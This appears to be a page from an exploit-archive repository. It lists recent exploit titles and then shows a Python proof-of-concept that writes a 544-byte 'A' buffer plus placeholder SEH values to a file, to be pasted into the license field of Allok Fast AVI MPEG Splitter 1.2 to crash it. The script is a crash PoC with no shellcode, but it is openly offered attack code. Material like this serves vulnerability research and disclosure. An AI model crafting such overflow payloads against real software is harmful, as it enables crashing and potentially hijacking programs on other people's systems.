9ea5e15796
13 changes to exploits/shellcodes Sun Solaris 11.3 AVS - Local Kernel root Exploit Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC) AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC) Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit) wityCMS 0.6.1 - Cross-Site Scripting Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change) TI Online Examination System v2 - Arbitrary File Download PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection CoSoSys Endpoint Protector 4.5.0.1 - Authenticated Remote Root Command Injection Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution Seq 4.2.476 - Authentication Bypass
32 lines
No EOL
977 B
Python
Executable file
32 lines
No EOL
977 B
Python
Executable file
# Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC
|
|
# Vulnerability Type: SEH Overwrite POC
|
|
# Discovery by: Shubham Singh
|
|
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
|
|
# Discovey Date: 2018-08-01
|
|
# Software Link: http://www.alloksoft.com/fast_splitter.htm
|
|
# Tested Version: 1.2
|
|
# Tested on OS: Windows XP Service Pack 3 x86
|
|
|
|
# Steps to Reproduce:
|
|
# Run the python exploit.py , Open "exploit.txt" and copy content.
|
|
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
|
|
# In the License field paste the content of "exploit.txt".
|
|
# Press "OK" and B00m Crashed.
|
|
|
|
#!/usr/bin/env python
|
|
|
|
# SEH chain of main thread, item 0
|
|
# Address=00129B78
|
|
# SE handler=43434343
|
|
# SEH chain of main thread, item 1
|
|
# Address=42424242
|
|
# SE handler=*** CORRUPT ENTRY ***
|
|
|
|
buffer = "\x41" * 544
|
|
nseh = "\x42\x42\x42\x42"
|
|
seh= "\x43\x43\x43\x43"
|
|
|
|
exploit = buffer + nseh + seh
|
|
f = open ("exploit.txt", "w")
|
|
f.write(exploit)
|
|
f.close() |